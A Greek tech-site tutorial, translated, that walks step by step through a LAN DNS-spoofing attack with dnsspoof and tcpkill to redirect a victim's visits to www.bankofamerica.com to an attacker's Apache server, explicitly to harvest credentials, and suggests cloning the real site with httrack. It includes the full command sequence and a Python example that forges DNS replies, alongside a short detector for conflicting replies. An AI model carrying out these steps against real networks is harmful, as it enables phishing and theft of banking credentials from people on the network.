DNS Hacking: Local network redirect to our page

In this guide we will take advantage of the Domain Name System (DNS). As you know, DNS resolves domain names, that is, it converts a name such as iguru.gr into an IP address such as 23.236.62.147.

If we can subvert this protocol, we can send someone looking for a page such as www.bankofgreece to our own malicious site and harvest their credentials.


Dug Song of the University of Michigan developed dsniff, a suite of hacking tools that is well suited to this purpose. We have already used one of its tools, arpspoof, to carry out a man-in-the-middle attack. In this attack we will use the dnsspoof tool, which lets us forge DNS replies on a local network.

Remember, even though this attack requires you to be on the same local network, you could reach that network through a remote vulnerability or a weak password on just ONE machine. In an institution with thousands of computers on its network, this means you only need to find a single exploitable machine before you can apply this attack to the whole network.

Step 1: Run Kali

Let's start by running Kali.


Step 2: Open dnsspoof

Depending on the version of Kali you are using, you may find dnsspoof in the menu under Sniffing, or you can always open a terminal and type dnsspoof. Its usage line is:

dnsspoof [-i interface] [-f hostsfile] [expression]

Without an -f file, dnsspoof answers every address query it sees on the LAN with the attacker's own IP address; with one, it answers only queries for the names listed in that file.


Step 3: Setup for Sniffing

We will try to get a Windows 7 system on our network to redirect its www.bankofamerica.com navigation to our website.


Step 4: Clear the DNS cache

First, we clear the Windows 7 DNS cache, so that the client does not answer itself from its cache but sends a fresh query onto the network. This matters: if the name is already cached, no query goes out and there is nothing for us to forge. On a real target you would have to wait for the cached record to expire; in the lab we simply flush it.

Close your browser, open cmd.exe and type:

C:\> ipconfig /flushdns

Now we put the network card of the Kali system into promiscuous mode, so that it accepts packets addressed to anyone, not only to itself. Note that on a switched network this alone does not show us the victim's DNS queries; Kali has to be in the path of the traffic, which is what the arpspoof man-in-the-middle from the earlier guide achieves. (Sniffing tools such as tcpkill and dnsspoof open the interface through libpcap and enable promiscuous mode themselves while they run, so this step only makes the setting explicit.)

kali > ifconfig eth0 promisc

Next we break the existing connection between the Windows 7 system and www.bankofamerica.com. This makes the browser open a new connection, which, with the cache flushed, starts with a fresh DNS query that we can answer. From Kali type:

kali > tcpkill -i eth0 -9 host www.bankofamerica.com

Once the connection to www.bankofamerica.com has been torn down, stop tcpkill with Ctrl + C.

Step 5: Edit the Hosts file

Here we will use the hosts file to redirect the Windows 7 system search for Bank of America to our website. Let's go to the /etc directory.

kali > cd /etc

From there, we open the hosts file in any text editor. Let's use leafpad.

kali > leafpad hosts


Now that the hosts file is open, we add the following line. The hosts file simply maps an IP address to a domain name, so we map our own IP address to www.bankofamerica.com.

192.168.1.101 www.bankofamerica.com

Separate the two fields with whitespace; a tab or spaces both work. dnsspoof accepts exactly one name per line (no aliases), and the name may contain a wildcard, so a line such as 192.168.1.101 *.bankofamerica.com would also catch online.bankofamerica.com. Keep in mind that this is Kali's own /etc/hosts, so the entry also affects name resolution on Kali itself; you can just as well keep the spoofed entries in a separate file and point dnsspoof at it with -f.

Step 6: Create a new BoA website

Before going any further, we switch promiscuous mode back off on our network card (dnsspoof turns it on again by itself while it runs).

kali > ifconfig eth0 -promisc

Now we need to create a website that the user will be taken to when they type www.bankofamerica.com into their browser URL.

If we type the loopback address 127.0.0.1 into a browser on Kali while Apache is running, we see Apache's default web page. This is what we need to replace.


Let's create a simple website. Open the index.html file.

kali > leafpad /var/www/html/index.html


This is the default page. Replace its contents with a simple HTML page of our own and save the file.

Of course, to pull this off in a real attack you would have to build a site that looks and behaves exactly like the one you are spoofing, but that is a different scenario. Tools such as httrack can download and copy entire websites.

Step 7: Start the Apache Web Server

Now start the web server built into Kali. This is Apache and the service is HTTP, so go to Kali Linux -> System Services -> HTTP and choose apache2 start. This launches the web server on the Kali system that hosts the fake Bank of America site. If you prefer the command line, you can start apache2 by typing:

kali > service apache2 start

Step 8: Launch Dnsspoof

In our final step we start dnsspoof and point it at the hosts file. dnsspoof sniffs DNS queries on the LAN; for every query whose name matches an entry in the file it immediately sends a forged reply, with the same transaction ID and the same question, carrying the address from our file. It does not forward or block anything: the real DNS server still answers, but because we are on the local network our reply normally arrives first, and the client accepts the first matching answer and ignores the later one. Queries for names not in the file are left alone.

Remember, we mapped www.bankofamerica.com to our own IP address so they go to our own web server and see our own webpage.

kali > dnsspoof -i eth0 -f /etc/hosts
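To make Steps 5 and 8 concrete, here is an added Python example (stdlib only; it is not code from dsniff or from this guide). It loads a hosts file in the format dnsspoof -f reads, including a wildcard entry; builds a DNS query for www.bankofamerica.com the way a client sends it; forges the reply dnsspoof would inject (same transaction ID and question, our address as the A record); and then shows the defender's side, a check that flags a transaction ID answered twice with different addresses, since the real server's reply still arrives after the forged one. The hosts file, the packets and the address 203.0.113.10 standing in for the genuine answer are all constructed for the example; dnsspoof also answers PTR queries, which this example leaves out.

```python
# Added example (stdlib only), not dsniff or the guide's code; every packet here is constructed.
import fnmatch, struct
REAL_IP = "203.0.113.10"   # stands in for the genuine answer (TEST-NET-3 range)

HOSTS_FILE = """\
# dnsspoof -f format: address, whitespace, exactly one name per line; '*' is allowed
192.168.1.101   www.bankofamerica.com
192.168.1.101   *.bankofamerica.com
"""

def parse_hosts(text):
    """Return [(ip, name_pattern)] in file order; comments and blank lines skipped."""
    entries = []
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()   # tabs and spaces both separate fields
        if len(fields) == 2:                     # one name per line, as dnsspoof wants
            entries.append((fields[0], fields[1].lower()))
    return entries

def lookup(entries, qname):
    """First entry whose pattern matches qname; dnsspoof matches with fnmatch too."""
    for ip, pattern in entries:
        if fnmatch.fnmatchcase(qname.lower(), pattern):
            return ip
    return None

def encode_name(name):
    return b"".join(bytes([len(lab)]) + lab.encode() for lab in name.rstrip(".").split(".")) + b"\x00"

def decode_name(pkt, off):
    """Read a possibly compressed name; return (name, offset just past it)."""
    labels, end = [], None
    while True:
        n = pkt[off]
        if n & 0xC0 == 0xC0:                     # pointer back into the packet
            end = end or off + 2
            off = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if n == 0:
            return ".".join(labels), (end or off)
        labels.append(pkt[off:off + n].decode("ascii"))
        off += n

def build_query(txid, qname):
    # Recursive A/IN query, as the Windows resolver sends it (flags 0x0100 = RD)
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + encode_name(qname) + struct.pack("!HH", 1, 1)

def parse_query(pkt):
    qname, off = decode_name(pkt, 12)
    return struct.unpack("!H", pkt[:2])[0], qname, struct.unpack("!H", pkt[off:off + 2])[0]

def build_reply(query_pkt, ip, ttl):
    """Echo the query's ID and question, add one A record (name as a pointer to offset 12)."""
    txid, _, _ = parse_query(query_pkt)
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA; one answer
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + bytes(int(o) for o in ip.split("."))
    return header + query_pkt[12:] + rr

def forge_reply(entries, query_pkt, ttl=60):
    """Attacker side: answer A queries for listed names; the victim accepts the first reply
    whose ID and question match, and ours is sent from the LAN before the real one arrives."""
    _, qname, qtype = parse_query(query_pkt)
    ip = lookup(entries, qname) if qtype == 1 else None
    return None if ip is None else build_reply(query_pkt, ip, ttl)

def parse_reply(pkt):
    """Return (txid, qname, [A record addresses])."""
    txid, _, _, ancount = struct.unpack("!HHHH", pkt[:8])
    qname, off = decode_name(pkt, 12)
    off += 4                                     # skip qtype/qclass
    ips = []
    for _ in range(ancount):
        _, off = decode_name(pkt, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            ips.append(".".join(str(b) for b in pkt[off:off + 4]))
        off += rdlen
    return txid, qname, ips

def detect_conflicting_replies(replies):
    """Defender side: flag a (txid, name) answered twice with different addresses. dnsspoof
    cannot silence the real server, so its forgery is always followed by the genuine reply."""
    first, alerts = {}, []
    for pkt in replies:
        txid, qname, ips = parse_reply(pkt)
        if (txid, qname) in first and first[(txid, qname)] != set(ips):
            alerts.append({"txid": txid, "qname": qname,
                           "first": sorted(first[(txid, qname)]), "later": sorted(ips)})
        first.setdefault((txid, qname), set(ips))
    return alerts

def demo():
    # Victim asks for www.bankofamerica.com; dnsspoof answers first, then the real server does.
    entries = parse_hosts(HOSTS_FILE)
    query = build_query(0x1A2B, "www.bankofamerica.com")
    forged, genuine = forge_reply(entries, query), build_reply(query, REAL_IP, ttl=300)
    return forged, genuine, detect_conflicting_replies([forged, genuine])
```

Calling demo() returns the forged reply, the genuine reply and one alert naming 192.168.1.101 as the first answer and 203.0.113.10 as the later one. On a real network you would feed detect_conflicting_replies() the UDP payloads of port 53 responses in arrival order, taken from a span port or the resolver itself; two answers to one transaction ID that disagree is the trace this attack cannot avoid leaving.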


Step 9: Navigate to BoA from Windows 7

Now, from the Windows 7 system, type www.bankofamerica.com into the browser and it displays our fake website instead of the real Bank of America site, as shown below.


Now, when someone on the local network tries to navigate to the Bank of America website, they are taken straight to ours!

As you can imagine, with dnsspoof we can wreak all kinds of havoc on a local network.

That brings us to the end of this guide.

 

Published on iGuRu.gr
Written by Anastasis Vasileiadis
